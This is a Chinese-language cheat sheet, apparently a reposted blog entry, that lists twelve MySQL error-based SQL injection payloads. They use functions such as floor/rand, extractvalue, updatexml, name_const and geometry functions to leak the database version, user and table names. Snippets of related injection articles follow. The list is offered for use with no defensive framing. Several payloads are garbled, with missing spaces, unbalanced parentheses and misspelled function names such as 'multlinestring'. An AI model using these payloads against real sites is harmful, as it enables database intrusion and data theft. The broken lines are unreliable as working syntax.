報錯注入函式

2022-04-30 03:36:10 字數 1498 閱讀 2328

1、通過floor報錯,注入語句如下:   

and select 1 from (select count(*),concat(version(),floor(rand(0)*2))x from information_schema.tables group by x)a);
2、通過extractvalue報錯,注入語句如下:

and extractvalue(1, concat(0x5c, (select table_name from information_schema.tables limit 1)));
3、通過updatexml報錯,注入語句如下:

and 1=(updatexml(1,concat(0x3a,(selectuser())),1))
4、通過name_const報錯,注入語句如下:

and exists(select*from (select*from(selectname_const(@@version,0))a join (select name_const(@@version,0))b)c)
5、通過join報錯,注入語句如下:

select * from(select * from mysql.user ajoin mysql.user b)c;
6、通過exp報錯,注入語句如下:

and exp(~(select * from (select user () ) a) );
7、通過geometrycollection()報錯,注入語句如下:

and geometrycollection(()select *from(select user () )a)b );
8、通過polygon ()報錯,注入語句如下:

and polygon (()select * from(select user ())a)b );
9、通過multipoint ()報錯,注入語句如下:

and multipoint (()select * from(select user() )a)b );
10、通過multlinestring ()報錯,注入語句如下:

and multlinestring (()select * from(selectuser () )a)b );
11、通過multpolygon ()報錯,注入語句如下:

and multpolygon (()select * from(selectuser () )a)b );
12、通過linestring ()報錯,注入語句如下:

and linestring (()select * from(select user() )a)b );

基於函式報錯的注入

sql inject漏洞手動測試 基於函式報錯的資訊獲取 1.常用的報錯函式updatexml extractvalue floor 2.基於函式報錯的資訊獲取 sellect insert update delete 基於報錯的資訊獲取 技巧思路 一 在mysql中使用一些指定的函式來製造報錯,從...

函式報錯注入 盲注

即利用系統輸出的報錯資訊來進行注入 floor報錯注入 floor報錯注入應該是報錯注入中最為複雜的一種了 其中的基礎為下面這句話 1select count floor rand 0 2 x from security.users group by x 需要注意的時候floor後面的x為乙個別名,...

SQL注入 報錯注入

乙個帶get引數的 並且不從資料庫返回資料,但存在報錯資訊 檢視字段情況 報錯注入語句格式 and 1 2 union select1,2,3 from select count concat floor rand 0 2 sql語句 a from information schema.tables...